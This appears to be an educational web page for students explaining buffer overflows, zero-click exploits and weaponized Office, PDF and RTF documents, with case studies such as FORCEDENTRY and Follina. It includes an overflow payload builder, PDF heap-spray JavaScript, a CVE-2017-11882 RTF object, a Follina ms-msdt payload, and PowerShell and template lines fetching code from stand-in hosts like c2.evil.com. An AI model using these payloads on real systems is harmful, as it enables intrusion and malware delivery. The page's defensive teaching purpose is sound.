A deep walk into zero-click exploits, document weaponization, and the invisible attacks that compromise systems without a single interaction. Built for students and the security-curious.
▼ scroll to begin ▼An exploit is a piece of code, data, or sequence of commands that takes advantage of a vulnerability (a bug or design flaw) in software to cause unintended behaviour — crashing systems, escalating privileges, or executing arbitrary code on a target machine. Exploits are the primary tool used by attackers, penetration testers, and nation-state cyber units to gain unauthorized access to systems.
Exploits range from simple buffer overflows (where too much data is written into a fixed-size memory region, overwriting control structures) to sophisticated, multi-stage attack chains that can compromise a device with zero user interaction. Some exploits require the victim to click a link or open a file (one-click). Others fire automatically when a message, image, or network packet is received by a vulnerable application (zero-click). Understanding how they work — step by step — is the first line of defense for any cybersecurity professional.
Require a single user action — clicking a link, opening a file, or viewing an image. The exploit triggers the moment the software processes the malicious input. Example: opening a weaponized PDF in Adobe Reader triggers a JavaScript-based heap spray exploit, giving the attacker full code execution. The user sees a normal document; behind the scenes, shellcode has already downloaded a remote access trojan.
No interaction needed. A received message, notification, or network packet is enough to compromise the device. The exploit targets automatic parsing code — image decoders, font renderers, media codecs — that runs before the user even sees the content. Example: NSO Group's FORCEDENTRY exploit sent a crafted PDF via iMessage. The iOS CoreGraphics parser decompressed a JBIG2 image stream, triggering a memory corruption bug that achieved full kernel-level code execution. The victim's phone was silently compromised with Pegasus spyware.
Weaponized Office docs (.docx, .xlsx), PDFs, or RTF files that execute code when parsed by the application. These work because document formats are complex — PDFs support embedded JavaScript, Word supports VBA macros and OLE objects, RTF supports binary object embedding. An attacker crafts a file that looks like a normal invoice or report, but contains hidden payloads in its internal structure. When the application's parser processes this structure, it hits a vulnerability, and the attacker's code runs.
Multiple vulnerabilities stacked together to achieve full compromise from initial access to persistence. A single exploit might only get code execution inside a sandboxed process. To escape the sandbox, escalate to admin/root, and persist across reboots, the attacker chains 2–5 additional exploits. Example: a document exploit (initial access) → sandbox escape (break out of Protected View) → kernel privilege escalation (get SYSTEM/root) → persistence mechanism (survive reboot). Each link in the chain costs $100K–$500K on the exploit market.
Every exploit is a math problem. Before any code is written, the attacker must calculate: how many bytes to write, what address to overwrite, how to convert a URL into hex, how to align shellcode in memory, and how to translate between decimal, hexadecimal, and binary. This section breaks down every calculation step-by-step so you see exactly how the numbers work.
Computers work in binary (base-2), humans work in decimal (base-10), but hackers work in hexadecimal (base-16). Why? Because one hex digit maps perfectly to 4 binary bits, and two hex digits map to exactly one byte (8 bits). This makes it trivial to read and write raw memory contents.
A buffer overflow isn't random — it's precisely calculated. The attacker must determine the exact number of bytes between the start of the buffer and the saved EIP (return address) on the stack. This offset determines how much "junk" padding to write before placing the hijacked address.
// This is the ACTUAL vulnerable function inside a PDF reader / document parser. // The programmer allocated a fixed-size buffer but used an UNSAFE copy function. void parse_document_title(char *incoming_doc_data) { char title_buffer[50]; // The application allocates exactly 50 bytes for the title // VULNERABILITY: strcpy() does NOT check the length of incoming data! // If the attacker puts 200 bytes in the document's title field, // it violently overflows title_buffer, spilling into adjacent memory // and overwriting the saved EBP and saved EIP on the stack. strcpy(title_buffer, incoming_doc_data); // ← THE BUG } // WHY THIS IS DANGEROUS: // title_buffer sits on the stack. Right after it (at higher addresses) are: // - Saved EBP (4 bytes) — the previous function's base pointer // - Saved EIP (4 bytes) — the RETURN ADDRESS (where the CPU goes next) // If the attacker writes 50 + 4 + 4 = 58 bytes, they control EIP! // SAFE ALTERNATIVE: strncpy(title_buffer, incoming_doc_data, sizeof(title_buffer) - 1); // This limits the copy to 49 bytes maximum — no overflow possible.
# ═══════════════════════════════════════════════════ # THE TOOL PROVISIONING LOGIC # This is how an attacker builds the overflow payload. # Every byte is calculated and placed precisely. # ═══════════════════════════════════════════════════ from struct import pack # ── Configuration (from fuzzing/debugging) ── buffer_limit = 64 # The 'safe' buffer size (found by reversing the binary) target_eip = b"\xef\xbe\xad\xde" # The hijacked address: 0xDEADBEEF (little-endian!) # THE MATH: # buffer_limit = 64 bytes (the vulnerable buffer's allocated size) # We need EXACTLY 64 bytes of junk to fill the buffer completely. # The next 4 bytes on the stack ARE the saved EIP (return address). # By writing 64 + 4 = 68 bytes, we overwrite EIP with our target. # 1. Fill the buffer with 'A's (0x41 in hex) padding = b"A" * buffer_limit # Result: b"AAAAAAAAAA...AAAA" (64 bytes) # In hex: 41 41 41 41 41 41 41 41 ... (64 times) # 2. Append the target return address # Because we filled EXACTLY 64 bytes, these next 4 bytes # spill over the buffer boundary and overwrite saved EIP overflow = padding + target_eip # Result: b"AAAA...AAAA\xef\xbe\xad\xde" (68 bytes) # Memory: [41 41 41 41 ...×64... 41 41 41 41] [EF BE AD DE] # ← buffer (filled) → ← EIP (hijacked!) → # 3. Add the shellcode (the actual malicious instructions) shellcode = b"\x90\x90\x90\x90" # NOP sled (0x90 = "do nothing") shellcode += b"\x31\xc0" # xor eax, eax (clear register) shellcode += b"\x50" # push eax (push NULL onto stack) shellcode += b"\x68\x2f\x2f\x73\x68" # push "//sh" (the command to run) # ... more instructions to download & execute payload ... # 4. ASSEMBLE THE FINAL ATTACK STRING final_attack_string = overflow + shellcode print(f"Buffer size: {buffer_limit} bytes (junk padding)") print(f"EIP target: {target_eip.hex()} → 0xDEADBEEF") print(f"Shellcode: {len(shellcode)} bytes") print(f"Total attack: {len(final_attack_string)} bytes") print() print(f"Layout in memory:") print(f"[{'A'*8}...×{buffer_limit}...{'A'*8}] [EFBEADDE] [9090...shellcode]") print(f" ←── {buffer_limit} bytes (junk) ──→ ← 4B EIP → ← {len(shellcode)}B code →")
The shellcode needs to contain the URL of the second-stage payload — but it can't use plain text strings (security tools would detect them). Instead, the attacker converts every character of the URL into its hex byte value using the ASCII table. This makes the URL invisible to string-based scanners.
# ═══════════════════════════════════════════════════ # A hacker uses Python to turn a URL into Hex for the Shellcode # This is how the URL becomes invisible to antivirus scanners. # ═══════════════════════════════════════════════════ url = "https://putty.exe" # Convert each character to its \x## hex representation hex_url = "".join(["\\x%02x" % ord(c) for c in url]) print(f"Original URL: {url}") print(f"Hex Encoded: {hex_url}") print() # Step-by-step: what ord() and %02x do for each character: # 'h' → ord('h') = 104 → hex(104) = 0x68 → "\x68" # 't' → ord('t') = 116 → hex(116) = 0x74 → "\x74" # 't' → ord('t') = 116 → hex(116) = 0x74 → "\x74" # 'p' → ord('p') = 112 → hex(112) = 0x70 → "\x70" # 's' → ord('s') = 115 → hex(115) = 0x73 → "\x73" # ':' → ord(':') = 58 → hex(58) = 0x3a → "\x3a" # '/' → ord('/') = 47 → hex(47) = 0x2f → "\x2f" # '/' → ord('/') = 47 → hex(47) = 0x2f → "\x2f" # ... and so on for every character # RESULT for "https://putty.exe": # \x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x75\x74\x74\x79\x2e\x65\x78\x65 # Now build the shellcode: machine code + the hex URL string shellcode = b"\x31\xc0" # xor eax, eax (clear EAX register) shellcode += b"\x50" # push eax (push NULL terminator) shellcode += b"\x68" # push DWORD (push 4 bytes of URL onto stack) shellcode += url[-4:].encode() # ".exe" as raw bytes shellcode += b"\x89\xe3" # mov ebx, esp (EBX now points to URL string) shellcode += b"\x50" # push eax (more stack setup...) shellcode += b"\x53" # push ebx (push URL pointer as arg) print(f"Shellcode bytes: {shellcode.hex()}") print(f"Shellcode size: {len(shellcode)} bytes") print() print("What antivirus sees: 31c050682e65786589e35053") print("What it ACTUALLY is: xor eax;push;push '.exe';mov ebx,esp;push;push")
Heap spraying is pure arithmetic. The attacker must calculate exactly how large each spray block is, how many copies are needed, and verify that the target address (0x0C0C0C0C) falls inside the sprayed region.
A PDF file is a structured database of numbered objects. Each object has a generation number (usually 0) and an offset (the byte position from the start of the file where that object begins). The cross-reference table (xref) maps object numbers to byte offsets so the PDF reader can jump directly to any object.
Every number in an exploit is calculated, not guessed. The buffer size comes from reverse-engineering the target binary. The EIP offset comes from cyclic pattern fuzzing. The heap spray address comes from memory layout analysis. The xref offsets come from counting bytes in the PDF file. If any single number is wrong by even 1 byte, the exploit crashes the target instead of compromising it. This is why exploit development is considered one of the most difficult skills in cybersecurity — it's applied mathematics at the machine code level.
Computers store everything as numbers — but hackers, CPUs, and network protocols each prefer different formats. Enter a value in any field and the others update automatically.
In a buffer overflow, the attacker must write exactly the right number of bytes to overwrite the return address (EIP). Too few = nothing happens. Too many = crash. This calculator finds the precise offset.
CPUs store multi-byte values in different orders. x86 uses little-endian (least significant byte first), while networks use big-endian. When building exploits, you must write addresses in the correct byte order or the CPU reads them wrong.
Heap spraying floods the process memory with repeated copies of your payload. When the exploited code jumps to a "random" address, the huge NOP sled catches the CPU and slides it into shellcode. More spray = higher chance of landing.
Modern attacks rarely use a single exploit. A document exploit is just the initial access — the first step in a multi-stage operation. Below is a realistic attack chain (based on real APT campaigns) showing how a single weaponized document leads to complete network compromise. Each step represents a different tool or technique, and each step is a potential detection point where defenders can break the chain.
Zero-click exploits are the pinnacle of offensive security research. The victim does nothing — no link clicked, no file opened, no permission granted. The exploit fires automatically when data is received and processed by a vulnerable parser. The attacker sends a specially crafted message, image, or data packet to the target device. The device's software automatically processes this incoming data, triggering the vulnerability before the user ever sees a notification.
Most zero-click exploits target message parsing code — the part of an application that automatically processes incoming data before the user even sees it. Here is the exact sequence of events in a typical zero-click attack:
// Zero-Click Attack Flow — Step by Step STEP 1: ATTACKER SENDS CRAFTED DATA → Attacker sends a message/image/file to the target → The data contains a carefully crafted malformed structure → Example: a PNG image with an oversized IDAT chunk header → The target device receives this over the network STEP 2: AUTOMATIC PARSING BEGINS → The app's background process picks up the incoming data → It calls the relevant parser (image decoder, PDF renderer, etc.) → This happens BEFORE the user sees any notification → The parser starts reading the crafted data byte-by-byte STEP 3: VULNERABILITY TRIGGERS → The malformed data causes an unexpected condition: • Integer overflow → allocates too-small buffer • Heap overflow → writes past allocated memory • Type confusion → treats data as wrong object type • Use-after-free → accesses memory already freed → The attacker now controls part of the process memory STEP 4: CODE EXECUTION → Controlled memory corruption redirects code execution → Attacker's shellcode runs in the context of the app → Downloads and installs spyware (e.g., Pegasus, Predator) → Achieves persistence across reboots STEP 5: THE USER SEES NOTHING → The crafted message may be deleted automatically → No crash, no notification, no trace → The device is fully compromised
The common zero-click attack surfaces are:
What happened: A buffer overflow in WhatsApp's SRTP (Secure Real-time Transport Protocol) stack. Simply calling the target installed Pegasus spyware. The call didn't even need to be answered — the VoIP processing code parsed the attacker's crafted signaling packets as soon as the incoming call was initiated.
How it worked: The attacker sent specially crafted RTCP packets during the call setup phase. These packets triggered a stack buffer overflow in the SRTP decryption function, overwriting the return address. The shellcode then downloaded and installed the Pegasus implant, achieving full access to messages, calls, camera, microphone, and GPS.
Impact: Used by governments to spy on journalists, activists, and political dissidents in over 40 countries. Affected all WhatsApp versions on iOS and Android.
What happened: Samsung added a custom image format called Qmage (.qmg) to their Android fork. The Qmage codec was integrated into the Skia graphics library, meaning every Samsung phone used it to decode images — including images received via MMS.
How it worked: The researcher (Mateusz Jurczyk of Project Zero) found that the Qmage decoder had multiple memory corruption bugs — heap overflows that occurred when parsing malformed Qmage files. Because Android's MMS handler automatically decoded image attachments, sending a single crafted Qmage file via MMS triggered the bug with zero user interaction. The researcher demonstrated complete remote code execution by sending a sequence of MMS messages.
Impact: Affected hundreds of millions of Samsung Galaxy devices. Required no user interaction — just knowing the target's phone number was sufficient.
What happened: NSO Group's most sophisticated exploit. It targeted Apple's CoreGraphics PDF parser via iMessage. This was not a simple buffer overflow — the attackers built a virtual computer inside the JBIG2 image decompression engine, achieving Turing-complete computation within the decompressor itself.
How it worked: The exploit sent a PDF disguised as a .gif file via iMessage. When iOS rendered the message preview, CoreGraphics parsed the PDF, which contained a JBIG2 image stream. JBIG2 is a compression format that supports logical operations (AND, OR, XOR) on bitmap regions. The attackers chained over 70,000 JBIG2 segment commands to build a virtual CPU architecture — complete with registers, a memory subsystem, and an instruction set — entirely within the decompressor. This virtual machine then computed the addresses needed for the exploit, bypassed ASLR (Address Space Layout Randomization), and achieved arbitrary code execution.
Impact: Bypassed Apple's BlastDoor sandbox (designed specifically to protect iMessage). Used to deploy Pegasus on iPhones of journalists, heads of state, and human rights activists. Google Project Zero called it "one of the most technically sophisticated exploits ever seen."
What happened: Another iMessage zero-click exploit chain discovered by Citizen Lab. This one used malicious PassKit (.pkpass) attachments — the same format used for Apple Wallet passes (boarding passes, tickets, etc.).
How it worked: The exploit chain combined two vulnerabilities: CVE-2023-41064 (a buffer overflow in ImageIO when processing WebP images) and CVE-2023-41061 (a validation issue in Wallet). The attacker sent a PassKit attachment via iMessage containing a crafted WebP image. ImageIO's WebP decoder hit the buffer overflow, and the second bug allowed sandbox escape. Together, they achieved full device compromise.
Impact: Used by NSO Group to deploy Pegasus. Apple issued emergency patches (iOS 16.6.1). This exploit demonstrated that even after years of hardening iMessage (BlastDoor sandbox, pointer authentication, etc.), zero-click attacks remained possible.
Document exploits turn familiar file formats — Word (.docx), Excel (.xlsx), PDF (.pdf), RTF (.rtf), and PowerPoint (.pptx) — into weapons. Because users trust documents (they receive invoices, resumes, contracts, and reports daily), weaponized documents remain one of the most effective initial access vectors in real-world attacks. The attacker crafts a file that looks completely normal when opened — it displays the expected content (an invoice, a report, a chart). But hidden inside the file's internal structure are malicious payloads that execute code the moment the application parses them.
Document formats are inherently complex. The PDF specification alone is over 1,000 pages. Microsoft's Office Open XML format contains dozens of XML namespaces with hundreds of features. This complexity means there are thousands of code paths in the parser — and each code path is a potential vulnerability. Below are the eight primary techniques attackers use to weaponize documents.
What it is: Visual Basic for Applications (VBA) is a full programming language embedded inside Microsoft Office. Macros are VBA programs stored inside .docm, .xlsm, or .pptm files. When a user clicks "Enable Content," the macro runs with the same privileges as the Office application.
How attackers use it: The attacker writes a VBA macro that uses the Shell() function or WScript.Shell to execute system commands — typically downloading a second-stage payload from a remote server using PowerShell (powershell -e [base64 encoded command]). The macro auto-executes on open via Auto_Open() or Document_Open() event handlers.
Example generation: A macro containing Sub Auto_Open() / Shell "powershell -e JABjAD0..." / End Sub executes the moment the user clicks "Enable Content." The base64 string decodes to a PowerShell cradle that downloads a Cobalt Strike beacon from the attacker's server.
What it is: Object Linking and Embedding (OLE) allows embedding foreign objects inside a document — Excel sheets inside Word, PDF files inside PowerPoint, or even executable programs disguised with document icons. The embedded object is stored as a binary blob inside the document file.
How attackers use it: The attacker embeds a malicious OLE object — often targeting the archaic Microsoft Equation Editor (EQNEDT32.EXE), which has a known buffer overflow (CVE-2017-11882). When the document renders the embedded equation, EQNEDT32.EXE parses the OLE data, hits the overflow, and the attacker's shellcode executes. No "Enable Content" prompt appears because this is not a macro attack — it exploits the rendering engine itself.
Example generation: The OLE object contains a crafted equation binary where the font name field exceeds 48 bytes, overflowing EQNEDT32.EXE's stack buffer and overwriting the return address with a pointer to the embedded shellcode.
What it is: Word and Excel documents can reference external template files via a URL. The template URL is stored in the document's relationship file (word/_rels/document.xml.rels inside the .docx ZIP archive). When the document opens, Office fetches the remote template automatically.
How attackers use it: The initial document contains zero malicious content — it passes every antivirus scan. But when opened, it fetches a remote .dotm template from the attacker's server. That template contains the actual malicious macro or exploit. This two-stage approach evades email security scanners because the malicious payload never touches the email gateway.
Example generation: The attacker modifies document.xml.rels to include Target="http://evil.com/template.dotm" with TargetMode="External". The .docx file itself is completely clean. The payload only exists on the remote server.
What it is: Dynamic Data Exchange (DDE) is a legacy Windows inter-process communication protocol. Word and Excel support DDE field codes that can pull data from other applications. The field code { DDEAUTO "cmd" "/c calc.exe" } tells Word to execute the command via DDE.
How attackers use it: The attacker inserts a DDE field code into a .docx file. When the user opens the document, Word prompts "This document contains links to other data sources. Do you want to update?" If the user clicks "Yes" (which most users do reflexively), the DDE command executes — typically launching PowerShell to download malware. This works even with macros completely disabled.
Example generation: Insert field code: { DDEAUTO c:\\windows\\system32\\cmd "/k powershell -e [payload]" }. The field appears as "!Unexpected End of Formula" in the document text, which the attacker hides by formatting the font as white, 1pt size.
What it is: EQNEDT32.EXE is Microsoft's Equation Editor — a 17-year-old component compiled without any stack protections (no ASLR, no DEP, no stack canaries). It processes OLE objects embedded in Office documents when they contain mathematical equations.
How attackers use it: A specially crafted OLE equation object contains a font name that exceeds the 48-byte buffer in EQNEDT32.EXE. The overflow overwrites the saved return address on the stack. When the function returns, it jumps to the attacker's shellcode instead of the legitimate caller. Because EQNEDT32.EXE has no ASLR, the attacker knows exactly where the buffer is in memory.
Example generation: The OLE object's font record: [48 bytes of font name] [4 bytes: return address → shellcode] [shellcode bytes]. The return address is hardcoded to 0x00402114 (a known "call eax" gadget in EQNEDT32.EXE). Still actively exploited today.
What it is: A vulnerability in Microsoft's Support Diagnostic Tool (MSDT). Documents can invoke MSDT via the ms-msdt: protocol URI handler. The diagnostic tool accepts command-line arguments that include PowerShell code, which it executes with the user's privileges.
How attackers use it: The attacker creates a .docx file with an external OLE reference pointing to an attacker-controlled HTML page. When Word fetches this page, the HTML contains JavaScript that redirects to a ms-msdt: URI with embedded PowerShell commands. MSDT launches and executes the commands. No macros, no "Enable Content" prompt — not even Protected View stops it in some configurations.
Example generation: The ms-msdt URI: ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? /../../$(powershell -e [base64])/..". The PowerShell payload encoded in base64 downloads and executes a reverse shell.
What it is: Mark-of-the-Web (MotW) is a Windows security feature that tags files downloaded from the internet with a Zone.Identifier NTFS alternate data stream. Office blocks macros from MotW-tagged files. But ISO/IMG disk image files and ZIP archives can strip MotW from files inside them.
How attackers use it: The attacker packages a malicious .docm or .lnk file inside an ISO disk image. When the victim opens the ISO, Windows mounts it as a virtual drive. Files extracted from the mounted drive do not inherit the MotW tag, so macro-blocking and SmartScreen warnings are bypassed. This became the dominant delivery technique in 2022-2023 after Microsoft blocked internet-sourced macros by default.
Example generation: Attacker creates Invoice.iso containing Invoice.docm + a shortcut (.lnk) that auto-runs PowerShell. The ISO bypasses MotW → the .lnk runs without SmartScreen interception.
What it is: Microsoft OneNote allows embedding arbitrary file attachments inside .one notebook files. Unlike Word/Excel, OneNote did not block macros or restrict executable content — it simply showed a generic "double-click to open attachment" prompt.
How attackers use it: After Microsoft blocked VBA macros from internet documents (2022), threat actors switched to OneNote as their primary delivery format. The attacker embeds a .bat, .vbs, .hta, or .wsf script inside a .one file, layered behind a graphic that says "Double-click to view document." When clicked, the embedded script executes. Qakbot, AsyncRAT, and IcedID campaigns all adopted this technique in Q1 2023.
Example generation: The .one file contains an embedded payload.bat that runs powershell -e [base64], hidden behind a "Click here to view" image overlay that covers the entire page.
Every document exploit follows a similar pattern: delivery → trigger → execution → post-exploitation. Here is a detailed breakdown showing exactly what happens at each stage, including what code or data is involved and what the system sees:
// Complete anatomy of a document exploit chain // This shows EXACTLY what happens at each stage STAGE 1: DELIVERY → Attacker crafts a phishing email: From: accounting@acme-corp.net (spoofed domain) Subject: "Invoice #2024-0342 — Payment Overdue" Attachment: Invoice_March_2024.pdf (6.8 KB) → The PDF looks like a legitimate invoice when opened → The recipient is in Accounts Payable — they open invoices daily → The file passes the email gateway's antivirus scan (because the payload is compressed/obfuscated inside a stream) STAGE 2: TRIGGER — What Happens When the File Opens → The user double-clicks the PDF attachment → Adobe Reader (or the system PDF viewer) launches → The reader parses the PDF's object structure: Object 1: Catalog → finds /OpenAction → follows reference Object 7: Action → type is /JavaScript → loads JS engine Object 9: Stream → FlateDecode decompresses 4,821 bytes → The decompressed JavaScript begins executing immediately → The user sees the invoice on screen — nothing looks wrong STAGE 3: EXPLOITATION — The JavaScript Payload Executes → The JavaScript performs three operations: 1. DECODE: Converts hex-encoded shellcode to binary var sc = unescape("%ue8fc%u8200%u0000%u6089..."); 2. HEAP SPRAY: Fills 200MB of memory with shellcode copies for(i=0; i<200; i++) spray[i] = nopsled + shellcode; 3. TRIGGER: Calls a vulnerable Reader API function Collab.collectEmailInfo({subj: "A".repeat(0x4141)}); → The API function has a buffer overflow vulnerability → The oversized string overflows the buffer, overwrites EIP → EIP now points to 0x0C0C0C0C (inside the sprayed heap) → CPU jumps to the NOP sled → slides into shellcode → The attacker now has code execution in the Reader process STAGE 4: POST-EXPLOITATION — Full Compromise → Shellcode downloads second-stage payload: URLDownloadToFileA("http://c2.attacker.com/beacon.exe") → Beacon.exe is a Cobalt Strike implant that: • Establishes encrypted C2 channel to attacker's server • Uses kernel exploit for SYSTEM privilege escalation • Dumps credentials with Mimikatz • Moves laterally across the network via SMB/WMI • Discovers domain controller, becomes Domain Admin → Data exfiltration begins — or ransomware deploys → The entire chain: email → PDF → JavaScript → shellcode → beacon took less than 3 seconds from the moment the file was opened
Follina was a game-changer because it achieved remote code execution without macros, without "Enable Content" prompts, and even from the Windows Explorer preview pane. Here is exactly how the exploit works, step by step, with every component explained:
// Follina Attack Flow (CVE-2022-30190) — Full Technical Detail 1. THE DOCUMENT STRUCTURE Attacker creates a .docx file (which is a ZIP archive containing XML). Inside the ZIP, they modify: word/_rels/document.xml.rels They add an external OLE object reference: <Relationship Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/ 2006/relationships/oleObject" Target="https://attacker-server.com/payload.html" TargetMode="External" /> The .docx itself contains NO malicious code — it just has a URL. 2. WORD FETCHES THE REMOTE PAYLOAD → User opens the .docx (or just hovers over it in Explorer) → Word parses document.xml.rels, finds the external relationship → Word makes an HTTP GET request to the attacker's server → The server responds with an HTML file: 3. THE HTML PAYLOAD (served by attacker) <!DOCTYPE html> <html><body> <script> window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h]$(IEX('powershell -e JABjAGw...')) i]/../../../../../../../../../../../temp/doc.html\";"; </script> </body></html> 4. MSDT EXECUTES THE PAYLOAD → The ms-msdt: URI launches Microsoft Support Diagnostic Tool → MSDT parses the /param arguments → The IT_BrowseForFile parameter contains a PowerShell command wrapped in $() — which MSDT executes as part of path expansion → PowerShell runs with the user's full privileges → The base64-encoded command (JABjAGw...) decodes to: $c=New-Object Net.WebClient; $c.DownloadFile('http://c2.evil.com/shell.exe','C:\Temp\s.exe'); Start-Process 'C:\Temp\s.exe' 5. RESULT: FULL REMOTE CODE EXECUTION → No macro prompt — this isn't a macro attack → No "Enable Content" — there's no VBA code → Protected View was bypassed in RTF files (no sandbox at all) → Even the Explorer Preview Pane triggered the exploit → The user saw a normal document. The system was fully compromised. // Impact: Affected all Windows versions with Office installed. // Patched in June 2022. Exploited in the wild by APT groups // including Chinese state-sponsored actors targeting US/EU.
reg delete HKCR\ms-msdt /f
PDF files aren't just static pages — the PDF specification (ISO 32000, over 1,000 pages) supports embedded JavaScript, form actions, URI handlers, launch actions, complex stream objects, and encrypted content. Adobe Reader includes a full JavaScript engine (based on SpiderMonkey) that can execute code embedded inside PDF objects. Attackers weaponize these features to run arbitrary code the instant a PDF is opened.
A PDF file is structured as a collection of numbered objects. Each object has a type and properties defined by key-value pairs. Objects can reference other objects by number. The root of the document is the Catalog (always Object 1), which points to the page tree, which points to individual pages, which point to content streams containing the actual text and graphics. Hidden among these legitimate objects, an attacker adds JavaScript Action objects and compressed payload streams that execute automatically on open.
Below, we show two complete PDF files opened in a text editor — every single line of their internal structure is visible. The first is a clean, legitimate invoice. The second is the same invoice after an attacker has weaponized it by injecting three additional objects and modifying one line of the Catalog. Understanding the difference between these two files is the core of PDF forensics.
If you open any PDF file in Notepad (or a hex editor), you will see its raw internal structure. A PDF is not a binary blob — it's a structured text format containing numbered objects, each with a type and properties. Below are two complete PDFs: a legitimate invoice, and the same invoice after an attacker has weaponized it. Every single line is shown — nothing is skipped.
/OpenAction 7 0 R to Object 1 (the Catalog) — this is the auto-execute trigger./Next chaining for reliability.Different document formats are exploited in fundamentally different ways. Use the tabs below to explore each technique:
The PDF specification (ISO 32000) officially supports JavaScript. Adobe Reader includes a full SpiderMonkey JS engine (the same engine Firefox uses). This means a PDF file can contain complete JavaScript programs that execute automatically. Attackers abuse this to:
/OpenAction) — no user interaction required/AA /O), form submission (/AA /K), print events (/AA /WP), or even document closeCollab.collectEmailInfo(), util.printf(), spell.customDictionaryOpen() — many of which have had buffer overflow vulnerabilitiesapp.viewerVersion and serve version-specific exploitsHere's what the decoded JavaScript inside a malicious PDF actually looks like — this is extracted from Object 8's compressed stream after running it through a FlateDecode decompressor (tools like pdf-parser.py -f 8 do this automatically):
// DECODED from the FlateDecode stream — this is what runs // when the PDF opens in a vulnerable Adobe Reader var shellcode = unescape( "%u4141%u4141%u4242%u4242" + // NOP sled (encoded as Unicode) "%ue8fc%u0082%u0000%u8960" + // Shellcode start "%ue531%u64f0%u508b%u8b30" + // PEB walk to find kernel32 "%u0c52%u528b%u8b14%u2872" + // Locate LoadLibraryA "%u18b1%u50ff%u3368%u6832" + // Resolve API addresses // ... hundreds more bytes ... ); // HEAP SPRAY — fill memory with shellcode copies var spray = new Array(); var chunk = ""; // Build a 1MB block: NOP sled + shellcode var nopsled = unescape("%u0c0c%u0c0c"); while (nopsled.length < 0x100000) { nopsled += nopsled; } chunk = nopsled.substring(0, 0x100000 - shellcode.length); // Spray 200 copies across the heap (~200 MB) for (var i = 0; i < 200; i++) { spray[i] = chunk + shellcode; } // TRIGGER — exploit vulnerability in Collab.collectEmailInfo() // Buffer overflow overwrites saved EIP → lands in NOP sled Collab.collectEmailInfo({subj: "A".repeat(0x4141)});
Heap spraying is a memory manipulation technique that makes exploit reliability dramatically higher. The core problem for an attacker is: after the buffer overflow hijacks EIP, the CPU needs to jump somewhere — but the attacker doesn't know the exact address where their shellcode landed in memory. ASLR (Address Space Layout Randomization) makes heap addresses unpredictable.
The solution: Instead of needing to guess one exact address, the attacker fills hundreds of megabytes of heap memory with copies of the shellcode, each preceded by a huge NOP sled. Now any jump into that region (a ~200MB window) will land on either a NOP sled (which slides to the shellcode) or the shellcode itself. This turns a needle-in-a-haystack problem into a barn-door problem. The spray creates ~200 identical 1MB blocks, each containing ~1,048,232 bytes of NOP sled followed by ~344 bytes of shellcode.
0x0c0c0c0c because: (1) it's a predictable address in the heap region after spraying ~200MB, (2) 0x0C is the opcode for a benign instruction (OR AL, imm8) on x86 — so even if execution lands in the middle of the NOP sled, it slides harmlessly to the shellcode.
The hex dump below shows what a single spray block looks like in memory — the repeating NOP sled pattern followed by the actual shellcode:
RTF files are text-based documents parsed by Microsoft Word. Unlike .docx (which is a ZIP of XML files), RTF uses control words (like {\rtf1\ansi}) that Word's parser interprets directly. RTF supports embedded OLE objects via the {\object\objemb} control — which means an attacker can embed a binary exploit payload inside what looks like a plain text document.
Why attackers love RTF: (1) RTF files are parsed by Word's preview pane — the exploit can trigger just by selecting the file in Windows Explorer. (2) The binary payload is hex-encoded in the \objdata field, making it easy to generate with Python. (3) RTF doesn't trigger the Mark-of-the-Web check in some Office configurations. (4) Many email gateways don't inspect RTF as aggressively as .docx or .xlsx.
The example below shows a complete malicious RTF — it displays a normal invoice while hiding an Equation Editor exploit (CVE-2017-11882) in the embedded OLE object. The hex bytes in the \objdata field are the actual binary content of the exploit payload:
{\rtf1\ansi\deff0 {\fonttbl{\f0 Calibri;}} \pard Invoice #2024-0342 — Acme Corp\par \pard Total Due: $4,250.00\par {\* This part looks normal to the reader} {\object\objemb\objw1\objh1 ◄ EMBEDDED OLE OBJECT {\*\objclass Equation.3} ◄ Targets Equation Editor {\*\objdata 01050000 ◄ OLE header 02000000 ◄ Format ID 0B0000004571756174696F6E ◄ "Equation" in hex 2E33000000000000000000 0000000000 1C00000002000000E9FF ◄ Overflow starts here BF0000000000 ◄ Overwrites return addr 41414141 ◄ 0x41414141 = "AAAA" FC E8 82 00 00 00 60 89 ◄ Shellcode begins E5 31 C0 64 8B 50 30 8B ◄ PEB walk... ... more shellcode bytes ... }} }
OLE (Object Linking and Embedding) is a Microsoft technology that lets documents contain other documents or executable content. A Word document can embed an Excel spreadsheet, a Visio diagram, a PDF, an Equation Editor object, or even a packaged executable disguised with a custom icon. When the user double-clicks the embedded object, the associated handler application launches and processes it — and that processing is where vulnerabilities live.
How it works internally: A .docx file is actually a ZIP archive. Inside it, the word/document.xml file references embedded objects by relationship ID (e.g., r:id="rId8"). The relationship file (word/_rels/document.xml.rels) maps that ID to an embedded file (e.g., word/embeddings/oleObject1.bin). That .bin file contains the OLE structured storage with the actual exploit payload — it could be an Equation Editor exploit, a Flash SWF, an ActiveX control, or a packaged .exe with a fake PDF icon. When Word processes this document, it reads the ProgID attribute to determine which COM server to launch for the object — and that server is the vulnerable target.
<!-- .docx files are ZIP archives containing XML --> <!-- This is from word/document.xml --> <w:body> <w:p><w:r><w:t>Please review the attached report.</w:t></w:r></w:p> <!-- Normal paragraph above, but then... --> <w:p> <w:r> <w:object> <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1234567890" r:id="rId8" /> ◄ Embedded object </w:object> </w:r> </w:p> </w:body> <!-- The relationship file (word/_rels/document.xml.rels) maps rId8 --> <!-- to an embedded object in word/embeddings/oleObject1.bin --> <!-- That .bin can contain: --> <!-- • An Equation Editor exploit (CVE-2017-11882) --> <!-- • A Flash SWF exploit --> <!-- • An ActiveX control that downloads malware --> <!-- • A packaged .exe disguised as a PDF icon -->
For remote template injection, instead of embedding the payload directly, the attacker uses an external relationship:
<Relationships> <Relationship Id="rId1" Type="...normal-template..." Target="file:///Normal.dotm" /> <Relationship Id="rId8" Type="...attachedTemplate..." Target="https://evil.example/template.dotm" TargetMode="External" /> ◄ Fetches from attacker server! </Relationships> <!-- When Word opens this document, it automatically --> <!-- fetches template.dotm from the attacker's server. --> <!-- The template contains the actual macro/exploit. --> <!-- The original .docx file is CLEAN — no detections! -->
